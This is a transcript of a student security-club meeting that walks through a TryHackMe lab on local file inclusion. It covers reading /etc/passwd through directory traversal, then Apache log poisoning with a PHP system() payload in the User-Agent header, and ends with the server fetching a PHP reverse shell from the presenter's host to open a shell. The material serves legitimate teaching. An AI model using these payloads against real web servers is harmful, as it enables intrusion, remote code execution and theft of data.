All right, we're gonna go ahead and get started. Welcome everyone to another CPTC meeting. Again, Tuesday, 6:30 p.m. This meeting is gonna be, I think, fairly short. We're gonna be going over local file inclusion. I can see there's not a whole lot of people here today, so good thing we have the recording just so people who couldn't make it can still watch the recording. So yeah, let's just get into it. So some things to know, any topics, again, I mentioned every meeting, any topics you guys would like to learn about the semester or teach about yourself, you can put in the following Google Sheet, which I'll link in the Slack and Discord, and also put these slides up in the Discord as well, so you can have all the links as well. If you haven't already, but I assume everyone already has, make sure to join the Discord and the Slack for CPTC. And then for recordings of last semester's lectures, or also including this semester's as well, check out the UFC YouTube channel. We have like a whole playlist called, I think, Red Team Video, something like that, where I upload basically all of these recordings. And then again, if you need a Kali VM and you don't know how to set up on your own PC, or you don't want to set it up on your own PC, you can send me a DM and I can help you get set up on UF's vSphere client. I think the meeting after next, I want to try to do something where we actually use a Kali VM or just like a Linux VM specifically. We can start doing maybe some more like Windows hacking stuff. So definitely useful to get that set up before we get to that meeting. Also, make sure you guys have a TrackMe account, HackTheBox account, and if you have any issues signing up, just send me a DM and I can help with that. So today we're going to be learning about local file inclusion vulnerabilities, and we're going to do a short try hack me room on local file inclusion. So what is local file inclusion? It's actually in and of itself, it's not a vulnerability. It's sort of just how web servers work in terms of like serving content of specific files. So web servers occur when the path to a file is requested or included in a function that then returns or uses the contents of that file in some way. So an example of this would be like, you have this URL here, https example.com, module equals, and then test.php is the file that's being included. And then the site is using it in whatever way it chooses to. In test.php, it's probably running the code that's in test.php, but it could be like, for example, let's say it's example.com / picture equals, and then it was like dog.png, and then it would just display a picture of a dog, right? Of whatever that PNG was. That would be also local file inclusion. And this local file inclusion vulnerability specifically occurs when improper or non-existent filtering occurs of what files can be requested. So in the case of the above example, if we change test.php to, let's say, like /etc pastwd, which for those who don't know, /etc pastwd is like the essentially like the list of like usernames and groups for a specific Linux machine, and it exists on all Linux machines. Like every Linux machine has an etc pastwd, and if you can access that, it shows that you have some sort of sensitive information that you can access. So you can see how we change the URL to, instead of doing module equals test.php, we put module equals etc pastwd. And if they have no security in place that's like preventing like or filtering out what files can be accessed, then it can let us just access that specific file, and we basically can access almost any file on their victim machine, which is obviously not good, because then you can, there's a lot of sensitive files there that you can look for. So Lfi can also be used for remote code execution if the website also includes some sort of upload feature as well, for the most cases, or some way for you to actually like write data to their server, which is usually through an upload feature. So let's say example.com allows you to upload files. Like let's say it uploads like photos, for example, and they get stored in examples.com. Examples.com / uploads, right? You can then upload a malicious PHP file, let's say called evil.php, and it'll be stored in the /uploads, right? /uploads evil.php. Once you visit the URL example.com /uploads evil.php, that malicious PHP will actually be run on the web server, allowing you to basically have remote code execution on the machine if that's what your code is doing. And the Lfi vulnerability exists in this, in the fact that you can access files in the /uploads directly, which most of the time you shouldn't be allowed to do, essentially, because it means not only could you access like your own malicious code that you've uploaded, but also the fact that you can potentially access other people's uploads as well, which you definitely don't want. So are there any questions, I guess, on what local file inclusion is and what local file inclusion vulnerabilities are? It's also just known as Lfi for short. Okay, cool. So if not, we'll go ahead and just jump right into the try hack me. This is going to be a pretty short meeting today. the try hack me isn't too bad. So I'm just gonna go ahead and log in here real quick. So the one you want to do is to find it, you want to go to like learn all rooms and then do a search here for LFI, and then it's going to be the LFI basics one right here. So this is when you want to do it. Make sure you click join room wherever it says it here. I've already joined it, so I don't have to click that button. Yeah, make sure you join that room, and then make sure you start up the machine. So I'll go ahead and start it up right now because it takes a minute for it to actually spin up the machine. Now, while that's happening, I'm going to go ahead and start up my try hack me OpenVPN. So wherever you have yours stored, make sure you're doing sudo OpenVPN. And then whatever your OVPN file is called is usually going to be your username.ovpn. Put your password. I put in mine wrong. All right, there we go. And then you should see initialization sequence completed. And now you know that you're connected to the remote network. If you guys haven't done this before or having like issues connecting to it, just let me know. And I'll give you guys like a couple minutes just to get that set up, and then also to wait for the box to spin up. All right, so I'll assume that everyone's got their TriAcme spun up and they are connected to the network through OpenVPN. So let's go ahead and get started. So what is LFI? I basically explained it before, but it's a vulnerability which attacker can exploit to include or /read files. Why this happens? LFI occurs when an application uses the path to a file as input. If the application treats its input as trusted, a local file may be used in the include statement. Some impacts include denial of service, remote code execution, and sensitive information disclosure. So we started the VM, we completed that one. Acts as the first walkthrough. So we're going to go to the IP. Your IP is going to be different from mine, but just copy it there and then put it into your URL. And then we've got 3 walkthroughs that we're going to go through. So we'll start with the first one. And they tell us to do add a parameter at the end of the link named $page equals. So similar to in the example where I had the example here where I was using $module, and this specific website is using $page as like to specifically access a file, and the parameter is called page. So we do page equals, changes nothing, but if we do like test or something, then file included test, local file to be used, test. So let's include the home page. So we're going to do page equals and then home.html. And as you can see, we have now new HTML code called included home.html. And then I think if we even were to go, just to make sure that's actually the right file, if we went /home.html, oh wait, maybe LFI home.html. There we go, included home.html. So you can see it matches up here. Great, so we got that what's the message you get when you include home.html? It's just this here, you included home.html. There you go, just like that. You can also read other system files. For example, you can read the pass.wd file. That's what I was saying before, how basically all Linux machines have an etc pass.wd file. And so it's always good to check if you ever think a website has a local file including vulnerability, and then you know it's a Linux server, it's always good to check the etc pass.wd because if that works, you know that you have Lfi working, and you know that it's a file that exists on the web server, and it's not, you're not trying to guess what files exist. You know that one exists. So we'll give that a shot. Instead of home HTML, we're going to do /etc pass.wd. And as you can see here, we get the contents of the pass.wd file, which basically lists all of the users and the groups that they're in, and also the permissions that they have, et cetera, et cetera. So very useful information. At the very least, it shows that a vulnerability exists. And also, I guess at the most, you now have access to the list of users that exist on this machine, and also which ones have certain permissions to do what, essentially. So any questions on, like, I guess, how this very basic form of Lfi works? Okay, so if not, then we'll go ahead and move on. What user is the default, or is not there by default, I think is what it's asking. So in the etc pass.wd file, new users are added at the end of the file. So we want to look towards the very bottom. And then we can see here that we have a /home Lfi user. So Lfi is going to be the, we have it out here, and this is the whole user thing. So Lfi, and it's in the group THM. And so the user here that's been added is Lfi. So that's all you have to put in for this answer here, and you got it correct. So they said, thank you, congratulations, you've exploited it. Here's a piece of vulnerable code if you're interested in how it looks. So this is the code that was running on this server that allowed us to essentially get this local file inclusion vulnerability. It was setting a variable local file equal to the request page, which is the parameter here that we specified, and then it was just basically printing it back out to it. So imagine the next line right underneath this was probably like, echo local file, and it just echoed it back. So that's basically what the code on the back end looks like, which in the real world, you're not going to have access to. So you're going to have to sort of like test things out and try things and see what works. But it's just to show you sort of what vulnerable code might look like when it comes to Lfi. So cool. That was the first walkthrough there. Let's hit up the second one. So we'll actually just go back to here, and we'll hit walkthrough 2. So what is directory traversal? So directory traversal or path traversal is an HTTP attack which allows attackers to access restricted directories and execute commands outside of the web server's root directory or other paths. So basically allows, so what we were doing here before, when we did in the first one, go back here, when we did like home.html, that home.html is currently exists in the current directory that like lfi.php exists from. That's where we're accessing it from. And so in a lot of cases, you're not going to, the stuff you're looking for isn't going to be in the same exact directory that the current PHP file is currently running in, right? Like home.html or like etc pass.wd, for example, does not exist in the current directory that this web server is inside of. It exists like all the way in the root directory. And so to access that, you want to do something called directory traversal. So let's get that, add the page parameter again. Let's go back to the second walkthrough here. There. Yeah, let's go to the second walkthrough. Okay, so now it's asking us, add the page parameter again and try to include the home page again, and does it work? So let's go here, $page equals home.html. And it doesn't display what we're looking for. It tells us the file included is home.html, but it's prepending HTML/ in front of it. Now, home.html doesn't exist inside of HTML/. I think it exists in the directory just above it, right? So now and this is exactly what it tells us here. Suppose you have another page named, wait, does this work? So we put in no, right? Suppose you have another page named credit card, but it's within another directory. Let's try finding it. Navigate one directory up and try including the file. use dot dot slash to move one iteration up. So this is like a common, if you guys don't know, I guess, like the Linux terminal, dot dot slash refers to the directory just above, just outside of the one you're currently in. So right now, if I do pwd, which stands for print working directory, you can see here I'm in /home John try hack me. So I'm inside the folder home, and inside of that folder home is a folder called John, and inside of that folder is a folder called try hack me, and that's the one that I'm currently in, right? So if I do the dot refers to current directory being try hack me, right? So if I were to do ls/la dot,
John.
Yeah.
You're not sharing your terminal.
Oh, sorry. Thank you for telling me that. Let me fix that here. All right, can you see now?
Yeah.
Awesome. Cool. So let me go back here. So pwd print working directory. I am in try hack me John home. So there's a folder home, and inside of that folder is the folder John, and inside of that folder is a folder try hack me, and that's what we're currently in. So if I do ls to list the files and then put dot, that's the current directory. So that's going to list everything inside of the try hack me folder. If I do ls dot dot, dot dot refers to the previous directory. So it's going to list everything inside of /John, which is going to be a lot more stuff, as you can see here. So that's essentially what dot dot means. So when it's saying here, use dot dot slash, it means we're trying to go one directory backwards. So we're getting, and right now we can see the current directory it's getting included in is HTML. If we use dot dot, we're going to go right outside of HTML. We don't want it like just to be constrained to HTML. We want to see everything before that. So we're going to try and do dot dot slash, and then it said to use credit card. Yeah, so credit card. So let's give that a shot. And there you go. We have we have access to the file called credit card, and we have access. And you can see here the path is HTML dot dot slash credit card. So what this is doing is essentially canceling out what was before it. So if I were to do right now, I'm inside of home John try hack me. If I do ls /home /John try hack me, right? Just like that, it's going to list basically everything that's in my current directory try hack me. If I do dot dot slash here, and then here, well, actually, if I do try hack me, right? Try hack me / dot dot slash, that's going to cancel out this one. It's going to show the John directory, right? Because what it did was, all right, show me all the files inside of home, inside of John, inside of try hack me, and then inside the directory right above this one, which is going to be the John one, right? So having this here cancels this one out, just like having this here, having these two dots here cancel this guy out, allowing us to access the credit card file, which exists outside of the HTML directory. That's essentially what we're doing with directory traversal and how that works. And then we can just copy the numbers over that we found here and stick them into these numbers here. So the same way you include the pass.wd file, you'll have to move more directories up. Try reading the pass.wd file. So here, let's go ahead and try reading the etc pass.wd file like we did before, and you'll notice it doesn't work because it's putting it inside of the HTML directory, and etc pass.wd is not inside the HTML directory. We want to escape out of that. Now, if we just go one directory up, however, that's also not going to work, because what that is, that's only going one directory up, and like the HTML folder is probably within another folder like var and www, right? So we want to keep going back and back and back a lot. Let's say in the real world, we don't know exactly how far back to go, but luckily that doesn't really matter, because we can put as many of these dot dot slashes as we want, and it will just, like, you can never have too many, because it'll basically it'll stop once you hit the root directory. Even if you put like 1,000 more dot dot slashes, it won't go any further, because it can't. There's nothing else left to go back. So we can put like 100 of these guys. I'm going to put like a safe amount, like this amount, just to be safe, because I don't know how far deep in this HTML directory is. So this is like a pretty safe number. Then we hit enter, and then boom, you can see here we have the etc pass.wd file. So yeah, this is why we have so many dot dot slashes, because we don't know how deep into the HTML folder is that there could be like, 10 directories behind this. Like HTML folder could be inside of like 10 other folders that are all within each other. And so it's always good to put like a bunch just so you can escape out of all those directories and get right to the very top to the root directory. Then you can access basically everything. So this is what directory traversal is, and we can see we got it here. Cool. So, and then this is the vulnerable code. You can see it's very similar to how it was before. The only difference is that they put HTML/ in front of it, basically to confine us to the HTML/ directory. So yeah, are there any questions on, I guess, directory traversal in LFI? I know this part can be a little bit more confusing. So yeah, if there's any questions, let me know. Okay, cool. So if not, we'll get into the very last one. So let's get out of here and go to the last walkthrough. Okay. So what is log poisoning? So log poisoning is a common technique used to gain a reverse shell from an LFI vulnerability. To make it work, an attacker attempts to inject malicious input into the server's logs. So this is how an Apache log file looks like to have the ability to use log poisoning. So Apache is just the web server software that 99% of Linux servers use. It basically just is the way they run their web server. They run it on using Apache. Excuse me. And so the Apache logs are basically just log files that basically will display like access.log will show any requests that were made to the web server. It'll show like various information about like what was requested, the user agent it came from. It might include the IP it came from. It'll have the timestamp of when it was requested, all that kind of useful logging information that someone might want to know. And the error log is just like if there's any errors in like the web server, it'll log that as well. That's essentially what it does. Most software logs things because it's very good at log things, so you can like have something to look at. That's what the access.log is. So what we're going to do is actually put malicious code into these access logs and then get it to run. And so in order to do that, the permissions on these log files have to be executable, right? So you can see here, and how you know that it is executable is by this guy here. So basically RWX means read, write, execute. So that's how we know that this is an executable file because it has read, write, execute, as you can see right here. So now we're going to inject some malicious PHP code into the server's logs. And like they even said here, no, in order for that to happen, directory should have read and execute permissions, which we just checked and confirmed that it does. Access the third walkthrough and add the page parameter. And let's try reading the Apache log file, which is located in var log apache2 access.log. Let's do copy. And then let's do page equals. Oh, wait, did I access the right LFI one? Make sure it's walkthrough 3. Okay, cool, it is. So page equals then Control V. So as you can see here, we have access to the Apache log file. Unfortunately, they didn't add new lines, so it kind of looks like a jumbled mess. But you can kind of make out what's going on here. We can see like the request that was being made, which is just the root directory. We can see the user agent that made the request. We can get we see the timestamp here when the request was made, what was requested, lfi.php, all that kind of stuff. We can even see like our previous request here to the .. /etc/pass_bb. Oh, you can see new lines including the page source. I didn't know that. Let's see. Page source. Oh, look at that. Thanks, Adam. Cool. So this is a lot easier to read now. So now we can see here we have the IP it came from. We've got the timestamp here. We have what was requested, the specific request made home.html. You can see our etc pass_bb request here. We can see the user agent right here. All this useful information for someone who's like managing their own web server. So let's go ahead and try to exploit this. So can we read the log? Yes, we can. So now it's poisonous. So this now we're gonna fire up Burp Suite here. So if you guys don't have Burp Suite, I think you can do it. Actually, I'll try to do it in Firefox just to avoid using Burp Suite. But then I'll also show it in Burp Suite just in case like you guys do have that. But what we're gonna do is basically, because as you can see here, let me grab it here. Some of this information can actually be edited by us. Specifically, the user agent string, we can actually change ourselves to essentially have it. We can change our user string, our user agent per se, actually, to whatever we want it to be. And then that'll actually get stored here. So if I were to change my user agent to like, I don't know, Bob likes bananas, and then we make a request to the server, it'll actually show up here, Bob's like bananas. Now, what we're actually going to try to do is actually inject PHP code so that instead of saying our user agent string like this one here, it's going to say like, run a system command to get us remote code execution. And then once we access the log, that PHP code will get run. So let's give that a try. I'm going to try to do it in Firefox and see if it works. So we'll go ahead and go to the inspect element here. If we go to network, let's just make another request to this so we can capture it. Take a look at this, and then we're going to go ahead and go to the headers here. Let me make this a little bit bigger, easy to read. So if we go to the headers and then we change the user agent, you can see here at the very, very bottom. Can we edit that? Oh, request headers. That was a way you could like make a request again in Firefox. Header request details. Okay, we have a resend here. Okay, edit and resend. Here we go. This is what we want. So we want to, just in case anyone didn't see it, we go to the headers here of the request, and then we click resend, and we click edit and resend. And now we want to go down to the user agent here, and we want to change this to PHP code. So PHP system, and then we're going to do $_get, and then we can call this whatever we want to the parameter that we want to like basically pass in the commands. So I'm going to call mine, I don't know, let's call my name, John, all right? Make sure to semicolon that, close that there. So for those who don't know, this PHP code, the system function in PHP basically allows you to run system level commands, like shell commands essentially. And the parameter we're passing into it is actually the whatever parameter in the web request that's sent that has the parameter John. So if this was like page, for example, instead of John, it would basically take in this var log Apache to access that log, and it would take that in as the command. So by us putting John here, when we make the next request, we're going to make sure we put in basically John equals and then the command that we want to do, and then that'll get passed into the system function, which will then get executed. So what we're going to do here is we're going to just edit that to be that, and then we're going to go ahead and send it over. Okay, it was sent. So now actually, if we refresh this, we can actually see the new request that was made. Let me actually close that now. Move that over, and let's view page source again, because that was a lot better idea. And you can see the new request that was made. And then let me see here. So this is the new request that was made, and it doesn't include the PHP code because it's being interpreted as PHP. So I think this will work. Again, I did this before using Burp Suite, so I don't know if this actually edited it properly, but we will find out right now, actually. So let's just go ahead and test it. So now we're going to add another parameter here called John, and I'm going to, or whatever you named it in your case, and I'm going to put it equal to an actual shell command. So I'll just do cat etc pass wd, and that one we'll know for sure if it works because we'll see just a whole bunch of stuff. And look at that, it worked. Awesome. You can see here how it got a lot bigger, because if you notice, all of this right here that I'm highlighting is all the etc pass wd file, all the way up to, wow, keep going, all the way up to like here basically. And then we'll do view page source on that, just so It's not annoying to the eyes. And look, there you go. So you can see here we have the entire ST pass to BD file displayed back to us. And now we have remote code execution on the machine. We can execute any PHP commands that we want. So are there any questions on sort of what we just did here and like how this sort of works and why I was able to work?
Can you show what you made the user agent again?
Yeah. So I'll go to inspect element, network. Here, I'll refresh it. So the user agent, opening this back up again, and then edit. I made it, I changed the user agent from Mozilla, blah, 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 this garbage. I changed it to this, and then PHP, and then system, and then I put $_ get in all caps, and then whatever parameter you want to call it. Mine was called John, and then the single quotes, brackets, close parentheses, semicolon, ended off, and then finish PHP code like that. So the question mark brackets are basically like starting and ending points for PHP code. And then system is the function that lets you execute system commands. And then $_get John is basically getting the value of the John parameter passed. Is that too hard to see, or can you see that okay?
I can see that. Thanks.
No problem. Cool. So let's go back to try hacking me and see what they wanted us to do. Yeah, they told us we basically did everything they told us to. Var log Apache 2 access log. We changed it to that. We forwarded it over. And then we can execute commands. And now let's give it a try and run uname-r. Actually, before we do that, I'm going to go ahead and spin up Burp Suite just to show people who maybe aren't using Firefox or want to know how to do it using Burp Suite. So I'm going to fire this guy up. Burp Suite is free, by the way, and I definitely recommend getting it because it's like super useful for any like sort of web hacking stuff. So we'll just start that up. Okay, we'll go to the proxy here. Intercept is on, and I'm actually going to use the browser itself because I don't feel like setting up my proxy stuff. Burp Suite comes with its own little like mini browser that'll automatically redirect everything for you, which is really nice. So I'm just going to forward everything right now, and then we're going to go to the URL. This URL here. Copy that. Go here. Make sure it works. Okay, cool. So now I'm going to turn intercept on. I'm going to make the request again. Now I've just captured it here in Burp. I'm going to send it to the repeater here. And I'll just forward that off and turn that off. And now we're in the repeater. And I'm going to do exactly what we did before in Firefox, but this time in Burp Suite. I'm going to change the user agent to my code here, which is going to be PHP system. And then we're going to do $_get. And then since I already have a variable named John, I'm going to use a different variable name just to prove that it works. I'll call this one Bob. And then close that, finish that off. And so we basically did exactly what we did before with Firefox, this time using Burp Suite. And then I'm going to go ahead and send this off. Okay, it got sent. We can now finish that. We don't care about this anymore. And now nothing's changed here. But now if we go to, if we do add, instead of John this time, you can still use John, it will still work, or whatever your name was before. This time I'm going to use Bob just to prove that it works again. And this time I'm going to do, again, cat etc pass to BD just to make sure that we can see the massive output. We know that it works. And there you go. As you can see, we have a whole bunch of output here. Means we know that it worked. That's essentially how you do it in Burp Suite. It's in this specific case, it was probably easier to do in Firefox because you didn't have to set up a whole proxy and all that kind of stuff. But in a lot of cases, Burp Suite is like super useful to use just because like of the amount of things that it can do, specifically with like web hacking and proxying and all that stuff. So I definitely recommend getting used to that. And doing like small challenges like these or easy ones like these is definitely a good introduction to sort of using it. The two, like there's a lot of tabs here. Like literally the only two that I use is the proxy and the repeater, like I just used right now. Proxy basically just intercepts all of the requests that are made by your browser. And then you can either edit directly right in here. Like if you were to intercept here, I refresh here, I could just edit the request here and send it off. But I like sending it to the repeater because I can like sort of like store it. And I don't have to like have this loading the entire time. So I have to sort of do right click, send to repeater, and then just turn this intercept off. And then the repeater, I can basically edit however I want, and I can continuously send it. So I can send that request, make a little change here and there, send it again, make a change, send it again, basically repeating the send. That's why it's called repeater. But those are potentially the only two tabs that I use, and only two tabs that most people use because it's like the two like most common and most like flexible tools that you really need. But yeah, I definitely recommend getting used to sort of Burp Suite for any web challenges. Cool. So we'll go ahead and minus those. Let's go to try hack me here. They told us to run uname-r and get the output of the command. So we'll go back here and do and John equals and then uname-r. This is going to be a lot harder to find, but luckily, Adam told me about viewing page source to get a new line, so now it's a lot easier. So now, if we look for it, oh wait, sometimes it's still pretty hard to spot. Was it over on this one? Let's see if we can see it. Try to. Maybe John doesn't work anymore because did he get overwritten? Let's try Bob and see. Am I crazy for not seeing it right now? Oh, there it is. There it is. Took us a second. There's uname-r. So yeah, there's our answer. I'm curious as to why it's only showing up once. Let's see if I run this again, will it show up twice? Oh, interesting. Maybe it doesn't show repeat requests immediately. Okay, well, either way, there's our uname-r output. Copy that and just throw that into the answer here, and we got that answer. And then read the flag from the Lfi user home directory using the same sort of stuff here. So let's, oh, that's in the way. Let's do that. So it's in, they said it's in the Lfi home directory. So let's do an ls on that, on /home Lfi. And there we go. We have the output from it. And we see we have here a flag.txt. So that's probably what they're talking about. So now we'll just simply put cat/home Lfi flag.txt. And then there you go. We have the flag right there. And then you throw that right back into here. So is any questions? Is anyone having any issues with that? Are logs ever read or write execute by default, by the way? Okay, yeah. So sorry, I missed that question, Adam. Are logs ever read or write by default? By default, that's a good question. Let me actually check. For some reason, I remember seeing a lot of them were for some reason. Let me actually check if like mine are. Var log Apache. Oh wait, do I know Apache still here? Let me check my own web server here. Weirdly enough, I think it's more common than you would think. And I think it actually might be by default. Var. Okay, no, so these ones are all. So the directory it's in, or the directory it's in is by default executable, which I think in the note here, it says that in order to happen, the directory should have read-write. So I think all it needs is the directory itself to have read-write execute permissions, not even necessarily the file itself. So maybe on some systems, they're not by default. Maybe on some, this file is, but the directory that it's inside of seems to be executable by default, which is interesting. So yeah, I think it's more of a case-by-case basis, but I think there are actually valid reasons for having the log files executable. I couldn't tell you off the top of my head what they were, but for some reason I've seen it more often than I should. Yeah. Does anyone have any other questions, I guess, related to log poisoning, directory traversal, local file inclusion in general, getting RCE, any stuff like that?
Do you think we could try getting a reverse shell like this? Because I've been trying and I haven't been able to for some reason.
Yeah, let's give it a go. Let's think here. How will we do that? So the hard part with that is it's going to be, it doesn't have an upload file feature. So we're going to have to, let's think here. We can have it download a file. So let's see if we can do, instead of uname as R, we can have it do like a wget and then to our remotely hosted file. So let's give that a shot. That'll be fun, actually. I'm going to go ahead and just download a reverse shell online. So I think Pentest Monkey is pretty good. Reverse shell, PHP. Yeah, I'm going to go ahead and steal this guy. Control A, copy that. I'm going to, so yeah, I'm going to host this just on, or make sure I open, let me get out of that, open a new tab here. I'm going to copy it here. Let me make a directory. It's called Lfi. Okay, so vim, and then I'll just call it rev.php. And then I'll paste this in here. Okay, let me go to the top here to find the IP. Okay, so what is my IP for this? This is going to be my IP, so I'm going to go ahead and do a copy here. And I'll leave the port 1234. That works fine for me. Okay, now I'm going to host this basically, host this file online or within my local network so that the server they're trying to hack can actually access it and then download it. So that I'm going to do Python 3 -m http.server. Yep, cool. So now it's asking it. Now, if it wants to access the file, it's going to be on port 8000. Just to prove that it works, I'm going to go to this IP here that I copied. I'm going to go online here and do paste, and then do port 8000. And boom, you can see our rev.php. So now we're going to have this guy download that file. So we're going to do wget. And then it's going to be basically this, copy that, paste, /rev.php. And I mean, it's possible they don't have wget installed, but maybe they will. We'll give it a shot and see what happens. Okay, let's, I can't read that properly. I don't know if it actually downloaded it or not. View paid source will tell me. Okay. I can't tell from this output, but let's just try and see. So let's start up a, according to here, it's downloaded it. So let's start up a listener, MP 1234, and then let's go ahead and just access page, and let's do rev.php and see what happens. Hey, look at that, it worked. So now we have a reverse shell. Yeah, so that was pretty fun. So what we did essentially is that because we got command execution, we had it using wget command, we had it download our reverse shell file, and we just hosted our own local instance of like a web server to get it to download it. And then once we downloaded it, we just used our LFI to basically access it. And then with our listener, we got a connection. Did that work for you guys? Were you able to get that set up?
Yeah, thanks.
Awesome. Cool. Yeah, that was fun. Yeah, I wonder what directory you're in. Oh, we're in the root directory. Okay, cool. So, yeah. So, are there any other questions, I guess, related to LFI, RCE, any of that kind of stuff? Any like to do with this challenge? If not, I think we can pretty much about end the meeting here. For future meetings, the next meeting, we'll probably take a look at remote file inclusion, which is pretty similar to local file inclusion, but it's going to be, instead of including local files on the vulnerable web server, you can include remote files, which is arguably even worse, because similar to what we just did here with how we got this reverse shell, instead of having to upload a file and then locally include it, we can just remotely include our file. So we can basically skip an entire step and just like instantly get RCE. So that's probably we're going to look at the next meeting. Just to reiterate, if there's any topics in pen testing that you would like to learn about, or maybe just teach about yourself, put it in the Google form, which I'll put these slides in the Slack and Discord so you can access that. And then also all the recordings from this meeting and past meetings are on UFC's YouTube channel. And I'll be uploading this one later today, so you can see it here as well if you want to go over anything again. But yeah, other than that, I got nothing else. Have a nice rest of your week, and I'll see you guys in the next meeting.